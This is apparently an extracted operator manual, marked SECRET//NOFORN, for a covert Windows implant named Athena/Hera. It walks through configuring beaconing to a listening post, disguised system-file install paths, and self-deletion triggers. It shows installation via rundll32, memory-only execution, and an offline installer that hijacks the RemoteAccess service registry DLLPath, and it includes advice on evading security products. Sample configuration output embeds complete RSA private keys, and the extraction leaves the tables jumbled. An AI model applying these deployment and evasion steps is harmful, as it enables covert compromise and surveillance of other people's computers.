(SCM) (no,yes) default:[yes] new value: [WIZARD COMPLETE] Figure 11 - (S//NF) Builder Wizard Review 6.4 (U) Configuration (U) This section contains the steps with detailed instructions/notes for configuring an implant. Table 7 - (S//NF) Step-By-Step Implant Configuration Instructions SECRET//NOFORN 15 SECRET//NOFORN ________________________________________________________________________ Action / Help Text 1 2 Notes Target - Parent ID (4 chars) default:[RnzI] new value: The name used for this group of implants. Target - Child ID (number - dword) default:[] new value: The optional name of a specific implant known as a child. This option allows the user to define a specific implant otherwise the system will use the first 4 bytes of the mac address or a random number. Name – 4 characters in length Name – dword – default is mac address (4bytes) 3 Target - dynamic data config type (internal,file,registry) default:[internal] new value: --------------------------------------------------------------------Target - dynamic data config type (internal,file,registry) default:[internal] new value: file The default location of configuration settings that change on the target. internal - 0 - use data file to store config file - 1 - use external file to store config registry - 2 - use registry to store config Default Hives: HKLM -> HKEY_LOCAL_MACHINE File - define the full path and file name NOTE: name can include environment variables Examples: c:\temp\a.txt or c:\ %SystemRoot%\a.txt HKCR -> HKEY_CLASSES_ROOT HKCC -> HKEY_CURRENT_CONFIG HKCU -> HKEY_CURRENT_USER HKUS -> HKEY_USERS Target - dynamic data config path (file name or registry value name) default:[None] new value: c:\temp\myfile.txt Example: HKCU\SOFTWARE\ATHENA --------------------------------------------------------------------Target - dynamic data config type (internal,file,registry) default:[internal] new value: registry Registry - define the full path to the registry value HKLM -> HKEY_LOCAL_MACHINE HKCR -> HKEY_CLASSES_ROOT HKCC -> HKEY_CURRENT_CONFIG HKCU -> HKEY_CURRENT_USER HKUS -> HKEY_USERS Examples: HKLM\SOFTWARE\Microsoft\Value 4 Target - dynamic data config path (file name or registry value name) default:[None] new value: HKLM\SOFTWARE\Microsoft\myvalue Beacon - Interval in seconds (number) default:[86400] new value: or HKLM\SOFTWARE\Microsoft\ATHENA The user must enter a subsequent value when selecting the file or registry option. See example entries in blue. The default time between beacons. Time in seconds SECRET//NOFORN 16 SECRET//NOFORN ________________________________________________________________________ Action / Help Text 5 Notes Beacon - Jitter as a percentage of Interval 0..100 (number) default:[5] new value: The default jitter used to randomize the beacon time based on a percentage of the interval time. (NOTE: 0 disables jitter) Percentage (0..100) 6 Beacon - Boot Delay in seconds (number) default:[60] new value: The default boot delay for the implant. The amount of time to wait after a reboot. Time in seconds 7 Beacon - Hibernation Delay in seconds (number) default:[60] new value: The default hibernation delay for the implant. The amount of time to wait before the first beacon will be processed. Time in seconds 8 Beacon - Tasking Delay in seconds (number) default:[60] new value: The default tasking delay for all commands processed. Time in seconds 9 10 11 12 13 Beacon - Domains (LP Server DNS hostname or IP Addresses separated by a comma) default:[None] new value: abc.com The default domain name (hostname or IP address) of the Listening Post to be used for beaconing. Beacon - Port (number) default:[443] new value: The default port number used to beacon from the target. Beacon - Proxy Port NOTE:0=disable (number) default:[0] new value: The default proxy port for processing beacons on the target. Beacon - User Agent String (string) default:[Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)] new value: Beacon - URL Path for LP (string) default:[/] new value: The default user agent string placed in the header when processing beacons on the target. Time in seconds Port number(0..65535) Port number(0..65535) String The default URL path on the server that is used for processing beacons on the target. WARNING: This value MUST be in the DATA_URLS field in the config.json file on the LP. String 14 15 Beacon - Accept Header (string) default:[text/html,application/ xhtml+xml,application/ xml;q=0.9,*/*;q=0.8] new value: The default accept header in the packet when processing beacons on the target. Beacon - Accept Language Header (string) default:[en-US,en;q=0.5] new value: The default accept language header in the packet when processing beacons on the target. String String SECRET//NOFORN 17 SECRET//NOFORN ________________________________________________________________________ Action / Help Text 16 Notes Beacon - Accept Encoding Header (string) default:[application/octet-stream] new value: The default accept encoding header in the packet when processing beacons on the target. WARNING: Changing this value may cause unexpected results when processing data on the target. String 17 18 19 Beacon - IE Proxy Address (string) default:[] new value: The default IE Proxy Address used to proxy beacon communication on the target. Beacon - WPAD Proxy Address (string) default:[] new value: The default WPAD Proxy Address used to proxy beacon communication on the target. Tasking - Overt State File Path (string) default:[] new value: The default overt state file path used to store state information during processing of commands. (NOTE: when empty – no state information is stored on target). This directory will store state files (random file names) of current processing information. String String String – full path 20 21 22 23 24 25 26 27 Tasking - Batch Execution Timeout in seconds (number) default:[0] new value: Tasking - Command Execution Timeout in seconds (number) default:[0] new value: Tasking - Chunk Size - maximum number of bytes in a single block (number) default:[0] new value: Tasking - Max CPU Utilization 0..100 (number) default:[0] new value: Tasking - Max Processing Data Size (number) default:[50331648] new value: The default batch execution timeout is used to cancel processing of long running batches. Uninstall - Date (YYYY-MM-DDTHH:MM:SS) – UTC default:[] new value: Uninstall - Deadman Delay in seconds (number) default:[0] new value: Uninstall - Beacon failure attempts (number) default:[0] new value: The default time and date of the automatic selfdeletion of the target executable. Time in seconds The default command execution timeout is used to cancel processing of long running commands. Time in seconds The default chunk size of a packet sent from the target to the Listening Post. Number in bytes The default maximum CPU utilization used by the system while processing commands. Percentage of system usage(0..100) The default maximum processing data size of the data to process on target. Number in bytes Date (YYYY-MM-DDTHH:MM:SS) The default delay that the target will self-delete after not receiving a valid beacon. Time in seconds The default number of beacon failure attempts to force a self-delete of the target executable. Number SECRET//NOFORN 18 SECRET//NOFORN ________________________________________________________________________ Action / Help Text 28 29 30 31 Notes Uninstall - Kill File Path - full file path on target (string) default:[] new value: The default kill file name that is used to force a self-delete when the file is present on the target system. Install - Target File Name (string) default:[%SystemRoot%\System32\ Microsoft\Crypto\RAS\ iprcache.dll] new value: Install - Data File Name (string) default:[%SystemRoot%\System32\ CodeIntegrity\ras.cache] new value: The default file path used for the host target file. Install - Restart service with Service Control Manager (SCM) (no,yes) default:[yes] new value: The option to restart the service after install. Otherwise, the tool will be installed and will not start until next reboot or restart of the host service. File Name File Name The default file path used for the data file on the target system. File Name Yes/No 6.5 (U) Output (U) The Builder produces multiple output components. All receipts will be placed in the receipts folder. Each build will be in its own directory and contain all target specific files. 6.5.1 (U) Output Receipt File (S//NF) The Builder outputs an XML receipt file containing all the configuration settings for a target. The receipt file is required when tasking implants and parsing output from a target. The receipt file name will include the parent id as well as the child id if one exists (e.g. test_ABCD0064_receipt.xml). Figure 12 shows an example of the receipt file format. Figure 12 - (S//NF) Example Receipt File - XML 6.5.1 (U) Output Target Files (S//NF) The Builder outputs files that are used to manage the target implant. Figure 13 shows the listing of the files included in a standard target configuration. -----BEGIN PUBLIC KEY----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwJjJBMrqVw3insRnvkGp b1ySeVzBU2SK38g8i1JpZXELqzNzmrXKjg23A9H24hojPHnANzruDe13qJY+0vpe wO7wbFWOCr5aJ2ETcDK+N601URMTsjy8k7uNasPtI+ffzuiCHvDYvoLtDORjAy45 zrwoPozzVlX01YEfc3nQMZ7YRmUZxNlkAq5nXoZuUeBzNpzYAEA8h84t2/HpFb+H +1RYWIf7ZvJTadLHcw+8PsCX06Gr+HZRpi/c9CEakzhVfIwQg4rPuXsMDbP0D38k IH09oP/yd73EJT4wO6jddtFWvXdOI/HWOcb8GXkpoPmcVP0jeaVOwE1l+nYddAou DKMzaYivpeHsdsA2RjnwlcIFJKEHmug7ga0+4Xr7PGv/B8tWmCyLJOFnTB3xTiJ6 AQ5+Fgej6I/zg1o9XVs37kNHBdxzkia6XmMapfezKFhL06IQtTzV383IU28bouaC QamGy009wFs0ZmjKVCxwsJoMNDWx/6iSg4diLu6Ju4jgsolG9SaOXur4pbOg8hFl z1lvSC5FBD3OekpQNIsfPWslHfNa0Mvw1g+CftEKV1EIwv+KCm0aNzVi3vf+LpHu jKN9go9oqyHK0UY2G1otCh+UlyLJJ71vHnJZ7jaMQLG3iYKmWN/PYz0svD50cEW9 wK31H27uRLVBZYGQ5815M5cCAwEAAQ== -----END PUBLIC KEY---- -----BEGIN RSA PRIVATE KEY----MIIJKAIBAAKCAgEAwJjJBMrqVw3insRnvkGpb1ySeVzBU2SK38g8i1JpZXELqzNz mrXKjg23A9H24hojPHnANzruDe13qJY+0vpewO7wbFWOCr5aJ2ETcDK+N601URMT sjy8k7uNasPtI+ffzuiCHvDYvoLtDORjAy45zrwoPozzVlX01YEfc3nQMZ7YRmUZ xNlkAq5nXoZuUeBzNpzYAEA8h84t2/HpFb+H+1RYWIf7ZvJTadLHcw+8PsCX06Gr +HZRpi/c9CEakzhVfIwQg4rPuXsMDbP0D38kIH09oP/yd73EJT4wO6jddtFWvXdO I/HWOcb8GXkpoPmcVP0jeaVOwE1l+nYddAouDKMzaYivpeHsdsA2RjnwlcIFJKEH mug7ga0+4Xr7PGv/B8tWmCyLJOFnTB3xTiJ6AQ5+Fgej6I/zg1o9XVs37kNHBdxz kia6XmMapfezKFhL06IQtTzV383IU28bouaCQamGy009wFs0ZmjKVCxwsJoMNDWx /6iSg4diLu6Ju4jgsolG9SaOXur4pbOg8hFlz1lvSC5FBD3OekpQNIsfPWslHfNa 0Mvw1g+CftEKV1EIwv+KCm0aNzVi3vf+LpHujKN9go9oqyHK0UY2G1otCh+UlyLJ SECRET//NOFORN 19 SECRET//NOFORN ________________________________________________________________________ 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 -----END RSA PRIVATE KEY---- 10 .\STATE_FILES 40 1000000 0 123 1 %SystemRoot %\System32\Microsoft\Crypto\RAS\iprcache.dll %SystemRoot%\System32\iprtrmgr.dll %SystemRoot%\System32\codeintegrity\ras.cache 0 0 0 10.3.2.56 443 0 Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) SECRET//NOFORN 20 SECRET//NOFORN ________________________________________________________________________ 5 0 0 0 /octopus/ -----BEGIN PUBLIC KEY----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA4GUhkIiQtZTYYGiz3ieh CyWOHz5KM5YbYrvkASsImNZrPem2jWBsHPBzimnrsziVPezxkRCZORBlMeThJgPA /RAh1udtKL0x5zW6hrxuibtwW+NJSZpigqVut6gMqrtiCrhtYOp17wq4+xyQtZJ/ D0yl2w8umsFMSLDW35LaS0Lg0CuuvhjanUfW61npOpl1jpfeOEW25b/VYlwrgjcd NdB48np1fBOe0MZLwuVMhVp2mv05jGjMdaBVwxdOlPt31ryZ/40KlfvucBqURhZp yTa9VWorCFmTzBq6+7ZZv71PhxqOIm1+5jgROi8U95YnVTlop82mRj5BCmoZNX6p 212ZoG5skRHsMP66ohNK5qyW/qk4CnDxqKQprkdIN7/qKJ+rQ732WY6d3f407nW3 fv01qGb+66J2nIXmkZ2mdE8NIY6FxygfMKkqnMpcNfiILK1VSJYDY/LWTNNdYWnK Q8gSBmV0klFx7BefANOY6luq0/7LzkcxOYz7AJDwXpCDVx0D/Eyc7X1K8EAX+jUY iBv/bAjNjH6862DgR16yqzb802P4DzTn2oVVdpg8QOg52Sca7ZrSjpAwFg9zBq7K U3+2xz7KvyZLxlfkNIpXFQRernuqVlpz057KqeI8KZpBNIlBYbDFAR/8TcXZxvqP d7Xdpx51gzCsyos/LlB1Mq8CAwEAAQ== -----END PUBLIC KEY---- -----BEGIN RSA PRIVATE KEY----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 SECRET//NOFORN 21 SECRET//NOFORN ________________________________________________________________________ 9KQOrFATxmyIt0kXbWXQ1yNmRKnybXAWHleAzCj0qrKf7CtdRSPOB7WetwTH5ork 7FYwjPTWEr+hsDZmKXOuU3XvlCByNbKe7M2CilseCcqpzhmQDghH3lIAp+BTkwYL zD5Z5IakrmXE+NmRafPUUZnEhmi1yNuinPeTlrULBbh3X6W9mvJQcOSFZ4HkaE5W nFVG1GYYAISzBqgk4aALrupQGzshdQgvEcfOeEZuYUxRaqeQGvZS7z/cDQ/10Z7J 3NN4NMOj7VGMNj/tcW5ScEba5ZbZwnPZWiDChHTblOpkbnLKhb/o1898RFaEryg= -----END RSA PRIVATE KEY---- 0xABCD0064 0 test │ builder.log │ test_ABCD0064_receipt.xml │ ├───installer │ installer_x64.dll │ installer_x86.dll │ ├───offline │ ├───linux │ │ functions.sh │ │ linux.sh │ │ reged.static │ │ target_x64.dat │ │ target_x64.dll │ │ target_x64.ini │ │ target_x86.dat │ │ target_x86.dll │ │ target_x86.ini │ │ │ └───windows │ offline_x64.exe │ offline_x86.exe │ target.ini │ target_x64.dat │ target_x64.dll │ target_x86.dat │ target_x86.dll │ └───ram_only ram_only_x64.dll ram_only_x86.dll - output log from the Builder - target receipt file - NOD spec installation files - 64 bit installation dll - 32 bit installation dll - linux offline installation files - registry editor - windows offline installation files installer for 64 bit recovery OS installer for 32 bit recovery OS configuration for specific implant - NOD spec ram-only version of Athena - 64 bit run dll - 32 bit run dll Figure 13 - (S//NF) Builder Output Files Note (S//NF) Athena's Builder has a --debug option that will build all the intermediate files and place them in a debug directory in the Builder output directory. SECRET//NOFORN 22 SECRET//NOFORN ________________________________________________________________________ 7. (U) Implant Installation 7.1 (U) Overt Installation on Disk Mode (S//NF) Once the target is created with the Builder, the implant can be installed with the Installer DLL. The specific name can be changed when deploying using a DLL file. • Installer_x64.dll – 64 bit installation DLL • Installer_x86.dll – 32 bit installation DLL (S//NF) Another tool is required to load the Installer onto the system. For testing purposes only, rundll32.exe (with Administrator access) can be used as the loader tool. However, testing the Installer using rundll32.exe may be flagged by the PSP (see discussion in Section 10.2). Usage: rundll32 installer_x64.dll,#2 Note (S//NF) The Shellterm entry point is at ordinal 1 and the rundll32 entry point is at ordinal 2. 7.2 (U) Random Access Memory-Only (RAM-Only) Mode (S//NF) Once the target is created with the Builder, the implant can be run in memory with the ram_only DLL. The specific name can be changed when deploying via a DLL file. • ram_only_x64.dll – 64 bit ram-only DLL • ram_only_x86.dll – 32 bit ram-only DLL (S//NF) Another tool is required to run the RAM-only instance on a system. For testing, rundll32.exe can be used as the loader tool. Usage: rundll32 ram_only_x64.dll,#2 7.3 (U) Implant Offline Installation (S//NF) The Offline Installer sets up Athena/Hera on an unbooted computer and updates the computer’s registry. The Installer can be run from a remote operating system by using a Linux boot disk (e.g., Ubuntu v14.04) or a Windows Installation disk and the Recovery Console. 7.3.1 (U) Offline Windows Installation (S//NF) The Offline Windows Installer requires a Windows distribution that has an active Recovery Console. The bitness of the Windows distribution does not affect the installation but the correct version of the Installer must be run in the console -- the Offline Installer version must match the bitness of the Windows Recovery Console. Either installation will resolve the correct target installation files. • offline_x64.exe – for use with the 64 bit Recovery Console • offline_x86.exe – for use with the 32 bit Recovery Console SECRET//NOFORN 23 SECRET//NOFORN ________________________________________________________________________ >offline_x64.exe OFFLINE::Dec 21 2015 USAGE: offline Searching C: Searching D: Searching X: Update options: 1) C:\Windows 2) D:\Window10 (x64) (x64) Select instance to update (q or x to quit):2 Processing: D:\Window10 (x64) >> Reg: SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip DLLPath -> %SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll Start -> 0x02 Type -> 0x20 >> Reg: SYSTEM\CurrentControlSet\Services\RasMan Start -> 0x02 Type -> 0x20 >> Reg: SYSTEM\CurrentControlSet\Services\SstpSvc Start -> 0x02 Type -> 0x20 >> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dll Dest: D:\Window10\system32\microsoft\crypto\ras\iprcache.dll >> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dat Dest: D:\Window10\system32\codeintegrity\ras.cache SUCCESS Figure 14 - (S//NF) Windows Offline Installer (S//NF)Figure 14 shows the output from an Offline Installer session. The installation script will scan all mounted disks and determine potential Windows versions. A list will be displayed and the user can select the specific instance to install. Note (S//NF) The offline tool allows alternate paths to be included on the command line as arguments. USAGE: offline.exe 7.3.1 (U) Offline Linux Installation (S//NF) The Offline Linux Installer requires the components and versions listed in Table 8 below. The Ubuntu v14.04 installation media will contain the correct versions of required software for the offline Linux installation. SECRET//NOFORN 24 SECRET//NOFORN ________________________________________________________________________ Table 8 - (S//NF) Required Offline Installer Components Component Utility bash sed od reged.static fdisk mawk grep mount file Version 4.3.8 or greater 4.2.2 8.2.1 or greater 0.1 140201(included in the Athena distribution) 2.20.1 or greater 1.3.3 or greater 2.16-1 or greater 2.20.1-5 or greater 1.5.14 or greater (S//NF) Begin the Linux based offline installation by booting the target with a Linux boot disk (i.e. Ubuntu installation media). Insert or download the Athena/Hera media. The Athena/Hera Media should contain two shell scripts (linux.sh, functions.sh) and an INI configuration file (usually target.ini). Configuration parameters for the target are pulled from the INI file. (S//NF) Run ./linux.sh . You will be prompted to select any available target windows partitions. Select the corresponding number as shown in Figure 15. Once you select the partition, the Windows architecture will be determined via a file utility call and the appropriate binaries will be deployed. Once installation is successful, restart the target machine. Figure 15 - (S//NF) Linux Offline Installation 8. (U) Tasker (S//NF) Some general usage comments are presented below: • Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and their use on multiple operations without modification may present a signature that could identify the presence of Athena in a network. SECRET//NOFORN 25 SECRET//NOFORN • • ________________________________________________________________________ The word 'overt' in a prompt for configuration information indicates the information will be visible to a user logged on to the target machine. Care should be taken to ensure these values are consistent with the operational CONOP. Configuration settings that can be modified when the implant is on target are indicated in the prompt text. 8.1 (U) Usage (S//NF) This section contains information for tasking an implant. Figure 16 (below) shows the command line options for the Tasker. Warning (S//NF) Implant tasking may be completed on the low-side; however, the operator should be aware that cryptographic key data will be in the clear. (S//NF) By default, the Tasker allows the Operator to interactively build tasking for an implant or implant family. Alternatively, the operator can also input tasking via a scripted tasking file. >python.exe tasker.py -h usage: tasker.py [-h] [-r RECEIPT] [-s SCRIPT] [-g GENERATE] [-p PRIORITY] [-x] [-e] [--id ID] [--debug] Tasker Configuration optional arguments: -h, --help show this help message and exit -r RECEIPT, --receipt RECEIPT This argument defines an existing receipt filename to be used for processing. -i SCRIPT, --import SCRIPT This argument provides the ability to import a script for processing. -g GENERATE, --generate GENERATE This argument provides the output path location. -p PRIORITY, --priority PRIORITY This argument provides ability to set the priority/ordering (0..255) NOTE: 128->default and 0->highest. -x, --persist This argument provides ability to set the batch as a persistent batch. -e, --stoponerror This argument provides ability to stop the batch on a command execution error. --id ID This argument provides the ability to force a specific initial task ID for a tasking session (usually just used for debugging purposes - number is decoded as hex). --debug This argument allows debugging information to be included in the output directory. Figure 16 - (S//NF) Tasker Command Line Options 8.2 (U) Command Line Options (S//NF) The Tasker has multiple command line options; however the tool may be invoked without any command line options. The local directory will be used to output results. SECRET//NOFORN 26 SECRET//NOFORN ________________________________________________________________________ Usage: python.exe tasker.py 8.2.1 (U) RECEIPT (S//NF) This argument defines an existing receipt filename to be used for processing. A receipt file is generated by the Builder and contains all the settings for the configured implant. 8.2.2 (U) SCRIPT (S//NF) This argument provides the ability to import a script for processing. A script is simply a text file that contains all the commands in a batch script. The following sections will describe the syntax for the command script. 8.2.3 (U) GENERATE (S//NF) This argument provides the output path location. By default, the output will be stored in the tasker_output directory. This option will override the location for the tasking output information. 8.2.4 (U) PRIORITY (S//NF) This argument provides ability to set the priority/ordering (0..255) NOTE: 128->default and 0->highest. Since each beacon will only retrieve a single batch command, this option allows the user to prioritize the command files to the target. 8.2.5 (U) PERSIST (S//NF) This argument provides ability to set the batch as a persistent batch. Normally when a command file is processed on the server, it will be deleted. This option allows SAFETY files to remain on the server and be processed for every beacon when no data is available for processing. There is a special SAFETY command to prevent any data written to the disk but providing a response from the target. If no data is available for a target, the target will not POST a response to the server. NOTE: these persistent blocks have the responses stored in the SAFTIES directory. 8.2.6 (U) STOPONERROR (S//NF) This argument provides ability to stop the batch on a command execution error. Should a command in the batch fail (e.g. PUT “c:\myfile”), the remaining batch can be cancelled to prevent undefined behavior of the batch. By default, STOPONERROR is set to false. With most commands (e.g. “exec net stat”), there are no side effects that need to be validated. 8.2.7 (U) ID (S//NF) This argument provides the ability to force a specific initial task ID for a tasking session (usually just used for debugging purposes - number is decoded as hex). 8.2.8 (U) DEBUG (S//NF) This argument allows debugging information to be included in the output directory. 